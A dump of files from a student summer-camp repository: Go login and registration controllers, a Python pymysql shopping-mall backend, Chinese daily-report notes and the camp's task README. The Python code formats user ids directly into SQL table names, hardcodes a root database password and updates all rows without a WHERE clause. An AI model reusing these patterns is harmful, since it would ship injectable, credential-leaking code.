\"already have\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 2 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"incomplete data\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc UserInfo(c echo.Context)error {\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.UserHits(userInfo)\n\tvar user model.User\n\tuser = model.UserInfo(userInfo)\n\tu := &user\n\treturn c.JSON(http.StatusOK, u)\n}" }, { "alpha_fraction": 0.6910569071769714, "alphanum_fraction": 0.7398374080657959, "avg_line_length": 10.090909004211426, "blob_id": "822e43460314ecdbca2a2796e32b07421e4f9bbb", "content_id": "62411280cc453932d66e09b472e7833dcaf02ba3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": 
"no_license", "max_line_length": 25, "num_lines": 11, "path": "/Shixiaoyanger/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n1.学习了json基本语法\n\n2.学习了beego中如何解析和转化为json格式\n\n 有看了点原生中的语法 有点混淆\n\n3.将热身中的接口重构 今天把路由改完了\n\n 另外在认证的地方加上了session\n\n" }, { "alpha_fraction": 0.6482029557228088, "alphanum_fraction": 0.6528541445732117, "avg_line_length": 21.112150192260742, "blob_id": "b479a66d302fefe484b5caff24451b0cb94fb122", "content_id": "68d8d109131822016394e89ee820ed6f1e0a6630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2539, "license_type": "no_license", "max_line_length": 113, "num_lines": 107, "path": "/jackwener/server/练手/controllers/index.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"hello/encryptions\"\n\t\"hello/models\"\n\t\"hello/models/class\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\n\ntype UserController struct {\n\tbeego.Controller\n}\n\nfunc (c *UserController) PageLogin() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n\n//通过路由\"/\",发送post请求,默认Json数据中User[0]的Name,Password为发送的信息值,返回的Json数据中Result:false与true说明了登录情况\nfunc (c *UserController) Login() {\n\tvar ob 
models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tname := ob.User[0].Name\n\tpwd := ob.User[0].Password\n\tpassword := encryptions.Salt(pwd)//MD5加盐加密\n\tu := class.User{}\n\tfmt.Print(u)\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"user\").Exclude(\"status\", \"apply\").Filter(\"name\", name).Filter(\"password\", password).One(&u)\n\tpermission := u.Status\n\t//var str string = strconv.Itoa(id)\n\tif err == nil {\n\t\tfmt.Println(err)\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\tc.SetSession(\"userPermission\", permission)\n\t\tfmt.Print(\"设置了\")\n\t\treturn\n\t} else {\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n\n//通过路由\"/\",发送post请求,默认Json数据中User[0]的Name,Password为发送的信息值,注册成功/失败Json中result相应为true/false\nfunc (c *UserController) Register() {\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\n\tu := class.User{\n\t\tName: ob.User[0].Name,\n\t\tPassword: encryptions.Salt(ob.User[0].Password),\n\t\tNickname: ob.User[0].Nickname,\n\t\tEmail: ob.User[0].Email,\n\t\tPhone : ob.User[0].Phone,\n\t\tGroup : ob.User[0].Group,\n\t\tStatus : \"apply\",\n\t}\n\tfmt.Print(u)\n\terr := u.Create()\n\tif err == nil {\n\t\tfmt.Println(err)\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}" }, { "alpha_fraction": 0.5298831462860107, "alphanum_fraction": 0.545742928981781, "avg_line_length": 25.860986709594727, "blob_id": "b075285e96b9f7f582f1e39387cbcfb68af1f4d9", "content_id": "ed9ac4df4fee671eb26e8fafe6d32169cdb2cf71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6416, "license_type": "no_license", "max_line_length": 81, "num_lines": 223, "path": "/Old-Li883/mall/model/client.py", "repo_name": 
"tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n客户的操作\n注册\n增加name,addr,phone作为收件地址 数据库未建立\n可以按类,地址找物品#此数据库已建立,物品数据库\n查看自己和商家的信息,修改自己信息\n将东西装进购物车,移除购物车,查看购物车 数据库未建立\n收藏页面,取消收藏,查看收藏 数据库未建立\n记录商品浏览记录 数据库未建立\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef register(id, password, email, name, addr, phone):\n # 前面忘记创建浏览记录表\n cursor.execute(\"select * from client where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into client(id,password,email,identify) values(%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n ))\n cursor.execute(\n \"create table info%s\" % id +\n \"(name VARCHAR(20),addr VARCHAR(100),phone VARCHAR(20))\")\n cursor.execute(\n \"insert into info%s\" % id + \"(name,addr,phone) values(%s,%s,%s)\", (\n name,\n addr,\n phone,\n ))\n cursor.execute(\n \"create table cart%s\" % id + \"(id VARCHAR(20))\") # 创建一个用户的购物车\n cursor.execute(\n \"create table browse%s\" % id +\n \"(c_id VARCHAR(20),id VARCHAR(20),num int(10),cls VARCHAR(20))\"\n ) # 创建一个用户浏览记录\n cursor.execute(\"create table message%s\" % id +\n \"(message VARCHAR(50))\") # 创建用户消息记录盒子\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef find_commodity_addr(name):\n \"\"\"\n 按地域查找所有商品\n 先找到该地狱下的商家\n 再找到该商家下的所有商品\n \"\"\"\n cursor.execute(\"select id from merchant where addr=%s\", name)\n merchant = []\n for p in cursor.fetchall():\n merchant.append(p)\n commodity = []\n for p in merchant:\n cursor.execute(\"select * from commodity where merchant_id=%s\", p)\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef find_commodity_cls(name):\n cursor.execute(\"select * from commodity where cls=%s\", name)\n commodity = []\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef 
find_info(who, id):\n cursor.execute(\"select * from %s\" % who + \" where id=%s\", (id, ))\n data = cursor.fetchone()\n return response(200, list(data))\n\n\ndef modify_info(id, password, email):\n cursor.execute(\"update client set password=%s,email=%s\", (\n password,\n email,\n ))\n db.commit()\n return response(200)\n\n\ndef in_shopping_cart(c_id, id):\n cursor.execute(\"insert into cart%s\" % c_id + \"(id) values(%s)\", (id, ))\n db.commit()\n return response(200)\n\n\ndef out_shopping_cart(c_id, id):\n cursor.execute(\"delete from cart%s\" % c_id + \" where id=%s\", (id, ))\n db.commit()\n return response(200)\n\n\ndef check_shopping_cart(c_id):\n cursor.execute(\"select * from cart%s\" % c_id)\n id = []\n for i in cursor.fetchall():\n id.append(i[0])\n return response(200, id)\n\n\ndef in_favourites(c_id, m_id):\n cursor.execute(\"insert into favourites(c_id,m_id) values(%s,%s)\", (\n c_id,\n m_id,\n ))\n db.commit()\n return response(200)\n\n\ndef out_favourites(c_id, m_id):\n cursor.execute(\"delete from favourites where c_id=%s and m_id=%s\", (\n c_id,\n m_id,\n ))\n db.commit()\n return response(200)\n\n\ndef check_favourites(c_id):\n cursor.execute(\"select m_id from favourites where c_id=%s\", c_id)\n data = []\n for i in cursor.fetchall():\n data.append(i[0])\n return response(200, data)\n\n\ndef check_commodity(c_id, id):\n cursor.execute(\"select * from commodity where id=%s\", id)\n data = cursor.fetchone()\n if data != (None):\n cursor.execute(\"select num from browse%s\" % c_id + \" where id=%s\",\n (id, ))\n num = cursor.fetchone()\n cursor.execute(\"select cls from commodity where id=%s\", (id, ))\n clss = cursor.fetchone()\n if num == (None): # 添加浏览记录\n cursor.execute(\n \"insert into browse%s\" % c_id +\n \"(c_id,id,num,cls) values(%s,%s,1,%s)\", (c_id, id, clss[0]))\n else:\n n = num[0]\n n += 1\n cursor.execute(\n \"update browse%s\" % c_id + \" set num=%s where id=%s\", (\n n,\n id,\n ))\n db.commit()\n return response(200)\n else:\n 
return response(400, \"This commodity has not exist\")\n\n\ndef buy_thing(c_id, id): # 商品从购物车消失,商家库存-1\n cursor.execute(\"select * from cart%s\" % c_id + \" where id=%s\", (id, ))\n data = cursor.fetchone()\n if data == (None):\n return response(400,\n \"please put this commodity into you shopping cart\")\n else:\n cursor.execute(\"delete from cart%s\" % c_id + \" where id=%s\", (id, ))\n cursor.execute(\"select commodity_rest from commodity where id=%s\", id)\n rest = cursor.fetchone()\n r = rest[0]\n r -= 1\n cursor.execute(\"update commodity set commodity_rest=%s where id=%s\", (\n r,\n id,\n ))\n db.commit()\n return response(200)\n\n\ndef add_addr(c_id, name, ad, phone):\n cursor.execute(\n \"insert into info%s\" % c_id + \"(name,addr,phone) values(%s,%s,%s)\", (\n name,\n ad,\n phone,\n ))\n db.commit()\n return response(200)\n\n\ndef modify_addr(c_id, name, ad, phone):\n cursor.execute(\"update info%s\" % c_id + \" set name=%s,addr=%s,phone=%s\", (\n name,\n ad,\n phone,\n ))\n db.commit()\n return response(200)\n\n\ndef check_addr(c_id):\n cursor.execute(\"select * from info%s\", c_id)\n data = []\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n\n\ndef find_message(id):\n cursor.execute(\"select * from message%s\" % id)\n data = []\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n" }, { "alpha_fraction": 0.6240713000297546, "alphanum_fraction": 0.6285289525985718, "avg_line_length": 15.341463088989258, "blob_id": "fa690cb2bb699c1b4cb29b3d567a53ad6027954c", "content_id": "4dee845ada61abd1302d36eef2162f93e61c0c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 761, "license_type": "no_license", "max_line_length": 55, "num_lines": 41, "path": "/jackwener/server/练手/models/class/users.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package class\n\nimport (\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\n// 
完成User类型定义\ntype User struct {\n\tId int `orm:\"pk\"` // 设置为主键,字段Id, Password首字母必须大写\n\tName string\n\tPassword string\n\tNickname string\n\tEmail string\n\tPhone string\n\tGroup string\n\tStatus string //管理员状态为1,普通用户状态为0,注册未认证用户状态为2\n}\n\n\n\nfunc (u *User) ReadDB() (err error) {\n\to := orm.NewOrm()\n\tfmt.Println(*u)\n\terr = o.Read(u, \"name\", \"password\")\n\treturn err\n}\n\nfunc (u *User) Create() (err error) {\n\to := orm.NewOrm()\n\tfmt.Println(\"Create success!\")\n\tfmt.Println(*u)\n\t_, _ = o.Insert(u)\n\treturn err\n}\n\nfunc (u *User) Update() (err error) {\n\to := orm.NewOrm()\n\t_, err = o.Update(u)\n\treturn err\n}\n\n\n\n" }, { "alpha_fraction": 0.6693313717842102, "alphanum_fraction": 0.6970688104629517, "avg_line_length": 15.062256813049316, "blob_id": "308fe00828935c2ef32f088a95ebd1e21a423b2b", "content_id": "a5ecc627096ab8443b89ab8cc24b951d808c2277", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14430, "license_type": "no_license", "max_line_length": 163, "num_lines": 514, "path": "/README.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 2018 冰岩程序组夏令营\n\n### 前言:\n\n+ 不会的话先 Google ,搜索完之后还是没有解决再来问我们\n\n+ 第一天先 fork 仓库:[bingyan-summer-camp2018](https://github.com/tofar/bingyan-summer-camp2018),本次夏令营要求代码,日报周报等全部托管在 你们 fork 之后的 github 仓库上\n\n 日报、周报不需要太多,只需要介绍每天学习了什么即可\n\n+ 之后的 code review,采用 PR --> MR 的形式\n\n 当你需要代码写了一部分的时候,可以向你们fork的仓库提交 pull request,我们会审核代码,如果有点问题,会附上建议,你们修改好之后我们再将你们的 PR merge 进我们仓库\n\n+ 在夏令营开始的时候会给你们每人分配一个合适的导师\n\n+ 我们每周一次组内分享,欢迎新人做分享\n\n+ 没做完,可以夏令营结束之后继续写,欢迎来问我们\n\n+ 坚持就是胜利,我希望你们在最后还能保持着刚刚进来的热情,很多事情没有你想象的那么难,当然也没有你想象的那么简单,但是很难的事情也是一步一步做完的,希望冰岩夏令营能成为你成为你大学的一个契机、一个跳板。加油!\n\n### 操作说明:\n\n- 首先 fork [此仓库](https://github.com/tofar/bingyan-summer-camp2018)\n\n- 在你的仓库操作的时候请不要对他人目录进行任何操作\n\n- 你的操作权限仅限于你的目录,目录名字为你的 githubID,若仓库中没有你的目录请自行创建\n\n- 提交 PR 的时候自行查看是否存在代码冲突,如果存在自行解决之后再提交 PR\n\n- 提交 PR 是提交到 dev 分支,不是 master 分支\n\n- 
提交之后最好跟导师说一声,让导师及时检查\n\n- 目录结构推荐如下:\n\n + README.md\n 必须注明相关开发环境,以及一些特殊说明\n + .gitignore\n 忽略一些不需要的文件\n + client\n 前端代码,如果不用webpack之类的打包的话,直接一个 dist 文件夹即可\n + dist\n 编译打包后的文件目录\n + index.html\n + css\n + js\n + src\n 源码\n + server\n 服务端代码\n + src\n 源码\n\n## 一、准备工作\n\n**注:准备工作主要是作为参考,不做要求,可以跳过,这里涉及到一些你写项目的时候可能会需要的知识**\n\n### 1. 环境准备\n\n+ 推荐使用 Linux or Mac 作为开发系统\n\n+ git\n\n+ 搭建本地开发环境\n\n 高性能反向代理代理服务器软件: Nginx/Openresty\n\n 数据库:MySQL/MongoDB/PostGreSQL\n\n 缓存数据库:Redis/memcached\n\n 语言环境:Python/Go/Java/PHP/node/Kotlin等\n\n 容器工具:Docker,docker-compose\n\n 云服务器:可以选择 阿里云或者腾讯云的学生套餐, 仅10元一月,前期学习只需要在本地即可,后期可能会用到\n\n 注:斜杠划分的选择其一即可\n\n+ 选择好自己适合的开发工具,如:编辑器 vscode,用不惯的话 IDE 亦可\n\n+ 安装一款后台接口测试工具,如:Postman\n\n### 2. 语言 \n\n- Python\n - [廖雪峰的Python3教程](https://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000)\n [廖雪峰的Python2教程](https://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000)\n - [Python3入门指南-官方中文](http://www.pythondoc.com/pythontutorial3/)\n [Python2入门指南-官方中文](http://www.pythondoc.com/pythontutorial27/index.html)\n - [Python 代码规范(Google 开源项目风格指南)](http://zh-google-styleguide.readthedocs.io/en/latest/google-python-styleguide/python_style_rules/) (必需)\n\n- Go\n - [官方链接](https://golang.org/)\n - [官方中文教程](https://tour.go-zh.org/welcome/1)\n - [语言规范](https://go-zh.org/ref/spec)\n\n- PHP\n\n + [PHP 代码规范](https://www.php-fig.org/psr/) \n\n- Java\n - [菜鸟教程](http://www.runoob.com/java/java-tutorial.html) \n - Java 代码规范\n\n- Node\n\n 关键字:单线程,异步,回调地域,Promise,async/await\n\n - [菜鸟教程-Node](http://www.runoob.com/nodejs/nodejs-install-setup.html)\n - [Node10.5 中文文档](http://nodejs.cn/api/) \n - [Node 官方文档](https://nodejs.org/api/) \n - [airbnb node 代码规范](https://github.com/airbnb/javascript) , [node 代码规范](https://github.com/dead-horse/node-style-guide)\n\n- Kotlin\n - [官方教程](http://kotlinlang.org/docs/tutorials/)\n\n### 3. 
框架\n\n- Python\n\n 可能会用到 uWSGI 启动\n\n - Flask\n - Django\n - sanic\n\n- Go\n\n 其实原生的以及封装的很好了\n\n - Gin\n - Echo\n - Beego\n\n- PHP\n - Laravel\n\n - CodeIgniter\n\n- Java\n\n Servlet 写小一点的东西也行\n\n - SSM + Spring Boot\n\n - Play\n\n https://github.com/playframework/playframework\n\n - Spark\n\n https://github.com/perwendel/spark/\n\n- Node\n\n - express\n - Koa\n\n- Kotlin\n\n### 4. 涉及知识\n\n#### 认证:\n\n熟悉以下三种前后端认证方式,一般在登录时使用\n\n- cookie\n- session\n- JWT\n\n#### 加密算法:\n\n不同需求,对应不同加密方式,先了解\n\n- 对称加密\n- 非对称加密\n- 哈希算法\n\n### 4. 基本前端知识和前后端交互\n\n注:初学前端请使用 Chrome\n\n- 基本 HTML、CSS 知识\n\n **关键字:**\n\n + HTML:布局,表格表单,区块,元素,列表\n + CSS:盒模型,样式表,选择器,浮动,定位\n\n- 基本 JavaScript\n\n **关键字:事件,DOM操作,作用域,变量,函数**\n\n 注:前端可使用相关UI框架和 JS 框架(react,vue),以及一些比较好用的 js 包(如请求包 axios),可自行选择,具体可以咨询前端组的同学。\n\n- HTTP基本知识\n\n 如:HTTP 方法:GET、POST、PUT、UPDATE等,HTTP状态码:404,500, 200,301等,HTTP URL,HTTP 基本传输格式:json,form等\n\n **关键字:HTTP 方法,HTTP状态码,HTTP传输格式,HTTP头部**\n\n- 前后端如何交互\n\n 如:前端如何获取后端返回的数据,如何发送请求,后端如何根据前端发过来的请求,回应请求,如何辨别不同的请求\n\n **关键字: js 请求库(axios, fetch, superagent选其一,原生亦可),URL, 域名,ip**\n\n### 5. 
数据库\n\n学习基本操作(增删改查)即可,以后可自行研究\n\n- MySQL/MongoDB/PostGreSQL\n- Redis\n\n可在菜鸟教程上速成\n\n## 二、热身\n\n注:前端能看就行,不是硬性要求,但是要求采用前后端分离的方式,拒绝后端渲染\n\n#### 简易成员管理系统:\n\n具体要求:\n\n+ 管理员登录/注册\n\n 管理员与普通成员信息类似\n\n 注:登录之后注意用户认证问题,如:从浏览器退出此页面之后,再次进入页面如何辨认此用户,登录过期等问题\n\n+ 普通成员注册\n\n 注册之后,需要管理员审核通过才能成为组员\n\n+ 查看未审核的成员,审核成员注册是否通过\n\n+ 添加成员\n\n 成员必须信息如下:用户ID(字符串),密码(要求在数据库中加密存储),邮箱,手机号,昵称,组别\n\n 其他信息自行思考\n\n+ 删除成员\n\n+ 修改成员信息\n\n+ 获取所有成员信息\n\n+ 可以根据组别显示成员\n\n**关键字: 认证,数据库,成员管理**\n\n## 三、项目\n\n注:前端能看就行,不是硬性要求,但是要求采用前后端分离的方式,拒绝后端渲染\n\n### 商城系统:\n\n形式不定:网页,小程序,桌面程序均可\n\n基本功能:\n\n+ 登录注册\n\n 用户密码使用不可逆加密\n\n+ 商品按照类别查询\n\n 如:商品类别:电子设备、书籍资料、宿舍百货、美妆护肤、女装、男装、鞋帽配饰、门票卡券、其他\n\n+ 商品按照地域查询\n\n 如:韵苑、沁苑、紫菘、其他\n\n+ 热门查询、最新查询\n\n 热门查询可在后台记录用户的浏览数据等信息\n\n+ 商品页面\n\n + 商品详细信息\n\n 标题、简介、价格等\n\n + 图片\n\n 图片可以存在本地,或者使用七牛云存储\n\n+ 个人信息页\n\n + 个人基本信息\n + 浏览量\n\n进阶功能:\n\n+ 图片压缩\n\n 浏览时显示压缩的小图片,详细页显示大一点的图片\n\n+ 收藏夹\n\n+ 商品浏览量、收藏量等\n\n+ 后台系统\n\n + 商品上架、下架\n + 商品信息变动\n + 系统通知\n\n+ 消息提醒\n\n 如:降价提醒、系统推送\n\n+ 接入微信或者QQ\n\n## 四、项目部署\n\n### 1. 配置nginx\n\n学习配置 nginx 做中间代理层,具体可从以下链接中选取部分学习,作为示例,夏令营之后可以好好研究,当然夏令营期间有时间也可以自行研究,遇到坑可以问我们。\n\n[nginx 配置简介](https://juejin.im/post/5ad96864f265da0b8f62188f) \n\n[openresty 实践](https://juejin.im/post/5aae659c6fb9a028d375308b)\n\n### 2. 配置 docker\n\n[Docker 从入门到实践](https://yeasy.gitbooks.io/docker_practice/content/install/ubuntu.html) \n\n[Docker 实践](https://juejin.im/post/5b34f0ac51882574ec30afce) \n\n### 3. 配置域名https (不要求)\n\n前提:有已经备案的域名,有服务器\n\n[Let's Encrypt 给网站加 HTTPS 完全指南](https://ksmx.me/letsencrypt-ssl-https/?utm_source=v2ex&utm_medium=forum&utm_campaign=20160529) \n\n## 五、附录\n\n### 1. 夏令营聚合\n\n+ 冰岩程序组夏令营:https://github.com/mu-mo/bingyan-summer-camp2018\n+ 冰岩前端组夏令营:https://github.com/BingyanStudioFE/summber-camp-2018\n+ 冰岩移动组夏令营: https://github.com/Liujiaohan/bingyan-summer-camp2018\n+ 冰岩产品组夏令营:\n+ 冰岩运营组夏令营:\n+ 冰岩设计组夏令营:\n+ 冰岩游戏组夏令营:https://github.com/CurryPseudo/bingyan-summer-camp-2018\n\n### 2. 
书籍推荐\n\n#### Python:\n\n- [Python 基础教程](https://zhiguangxiong.gitbooks.io/python/content/di-2-zhang-lie-biao-he-yuan-zu/tong-yong-xu-lie-cao-zuo.html) \n\n 不推荐快速入门\n\n- [简明Python教程](https://bop.mol.uno/)\n\n- [Effective Python 中文版](https://guoruibiao.gitbooks.io/effective-python/content/) [Effective Python 原版](https://hacktec.gitbooks.io/effective-python/content/en/) \n\n 很高质量的一本书,让你领略 Python 的一些哲学,以及一些 Python 的使用经验,适合有一定基础的 Python 选手\n\n- [Flask Web开发](https://item.jd.com/11594082.html) \n\n 讲了很多 web 的基础知识,适合 web 入门\n\n#### Go:\n\n- [《The Go Programming Language》中文版](https://www.gitbook.com/book/yar999/gopl-zh/details)\n\n- [《Effective Go》中英双语版](https://www.gitbook.com/book/bingohuang/effective-go-zh-en/details)\n\n- [Go语言实战](http://download.csdn.net/download/truthurt/9858317)\n\n- [Go Web编程](https://wizardforcel.gitbooks.io/build-web-application-with-golang/content/index.html) \n\n 可以了解基本web开发,推荐入门\n\n- [Go入门指南](https://github.com/Unknwon/the-way-to-go_ZH_CN)\n\n- [雨痕的学习笔记](https://github.com/qyuhen/book)\n\n 一共两本,第二本讲原理多(如:go 的gc, 内存管理等),第一本适合入门\n\n#### PHP:\n\n - 《深入php面向对象、模式与实践》\n - 《细说PHP》\n\n#### Node: \n\n+ 深入浅出 node\n\n#### JS:\n\n+ [你不知道的JavaScript](https://github.com/getify/You-Dont-Know-JS) 上、中、下 \n+ JS 高级程序设计\n+ [ECMAScript 6 入门](http://es6.ruanyifeng.com/) \n\n#### Java:\n\n+ effective Java\n+ Java 核心技术卷\n+ 深入理解jvm虚拟机\n\n### 3. 算法任务(夏令营不要求)\n\n只要你是一个程序员,那么算法对你就是必备!\n\n+ 常见排序算法\n\n 如:冒泡、插入、选择、希尔、堆排序、归并、快排\n\n+ 常见散列\n\n 如:分离链接法、开放定址法(线性探测、平方探测、双散列)\n\n+ 常见数据结构\n\n 如:链表、堆栈、队列、树\n\n+ 常见算法了解\n\n 如:贪婪算法、分治算法、动态规划、回溯\n\n 这些算法主要了解其思想\n\n+ 图论算法\n\n 如:最短路径算法、最小生成树、深搜、宽搜\n\n+ 。。。\n\n书籍推荐:\n\n+ 《数据结构与算法分析 C语言描述》黑皮书,质量很高\n+ 《算法 第四版》普林斯顿的书,好像还不错\n+ 《算法导论》(理论比较多)\n\n### 4. 
后台相关学习\n\n+ 面向对象和抽象的思想\n\n+ 熟悉 Github,熟悉 git 版本管理工具的基本命令操作,如:clone, add, commit, push, pull, merge, branch, checkout, tag\n\n+ http 协议,主要阅读《http权威指南》前三章\n\n+ tcp/ip协议,《计算机网络,自顶向下方法》tcp/ip协议至少要知道他的协议栈,每层是干嘛的,tcp连接建立、断开的过程,tcp/udp的区别\n\n+ WebSocket、Socket、TCP、http,http2\n\n+ Linux 常见操作学习,熟悉基本操作, 如:man, ls, mkdir, cd, cp, mv, scp, ssh, rm, ps, cat, head, tail, vim, wget, curl, chmod, chgrp, chown, sudo, grep\n\n+ 了解 linux基本概念:用户组,权限,文件系统,软/硬连接,挂载,启动等\n\n+ 了解 vim 基本操作,毕竟服务器上一般都是用vim操作,没有图像界面\n\n+ 学习 shell 脚本程序\n\n+ 正则表达式\n\n 这个经常用到,不管是那个方向\n\n+ 数据库设计,可以看下《SQL反模式》\n\n+ 常见设计模式,如:MVC模式,装饰器模式\n\n+ 常见安全问题\n\n 常用工具:浏览器 F12,抓包工具:Fiddler, wireshark\n\n - DDOS攻击\n - 中间人攻击\n - sql注入\n - ip欺骗\n - xss攻击\n - csrf\n - 远程脚本执行\n\n+ 操作系统基础知识\n\n 基本特性:并发、共享、虚拟、异步\n\n + CPU 进程调度,线程,进程\n\n + 共享,**信号量,PV操作,锁**\n\n + 内存管理\n\n 虚拟存储,段页式系统,缺页\n\n + 文件系统,ELF文件\n\n+ 分布式了解以及应用\n\n + 数据库分布式\n\n + 分布式常见问题\n\n 一致性问题,共识算法,FLP 不可能性原理,CAP 原理,ACID 原则,拜占庭问题,可靠性指标\n\n + 分布式算法\n\n Paxos 与 Raft\n\n### 5. 相关建议\n\n+ 良好的英文阅读能力对于一个优秀的程序员来说真的很重要,如果可以的话要养成看英文文档的习惯,毕竟很多好的文章、书籍都是国外的,翻译毕竟会有所损失,而且速度更新也没有看英文的快,不要因为觉得自己英语不好就不看英文文档和英文文章,如果只是阅读的话,还是OK的\n+ 对于我们来说,技术好不好其实不一定重要,最重要是你有独立解决问题的能力和对 code 的热爱与勇气。\n" }, { "alpha_fraction": 0.504273533821106, "alphanum_fraction": 0.5299145579338074, "avg_line_length": 5.210526466369629, "blob_id": "97324644907e760efc9cf79784eed221b713fd56", "content_id": "3314ab177397c8aedfdf874d5d65acccb08f55d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 15, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n**上午**\n---\n休息了一会儿\n\n---\n\n## **下午**\n\n继续学beego框架\n\n\n---\n## **晚上**\n\nbeego MVC弄明白了\n写出了大致的注册界面及数据记录\n有些bug\n明天改" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 11.066666603088379, "blob_id": 
"9b5e053256b2b4815649b7b59b406bfaced58772", "content_id": "d04835bc8dfb0fa560f27244a3adf800dafcb1e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 180, "license_type": "no_license", "max_line_length": 33, "num_lines": 15, "path": "/jackwener/server/练手/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport \"github.com/astaxie/beego\"\n\nimport (\n\t \"hello/models\"\n\t\"hello/routers\"\n)\n\nfunc main() {\n\tmodels.Init()\n\trouters.AdminInit()\n\trouters.IndexInit()\n\tbeego.Run()\n}" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.774193525314331, "avg_line_length": 9.666666984558105, "blob_id": "343601516a766c4dac456073cd25cf917fd002e5", "content_id": "695659d822fa44c07573eea9ab21e44f2069c424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/Old-Li883/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7\n\n今早因工程实训,晚上有事,故没有太多学习相关东西" }, { "alpha_fraction": 0.8389731645584106, "alphanum_fraction": 0.8623104095458984, "avg_line_length": 33.279998779296875, "blob_id": "065b465ca1d1bcb9b140e15a28dfe7ef2cb210ea", "content_id": "a85504fe0aeb925ee48d14795c278c686923159f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2387, "license_type": "no_license", "max_line_length": 210, "num_lines": 25, "path": "/jackwener/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n\n> 今天想了很多,有点感触,想写一些东西,算是对几天前的一个总结\n\n## 感想\n\n从7.6号开始,除开7.8号因为跑远拿修好的电脑,修系统引导启动那一天没怎么学以外,我应该每天都还是花了大量的时间,但对于我自己来说,我并没有感觉到学了太多'东西',就譬如每天在写日报的时候我都感觉没有太多写的,并不像以往那样能写 1个下午,看了1章xx书 之类的,但这几天的 '体验' 
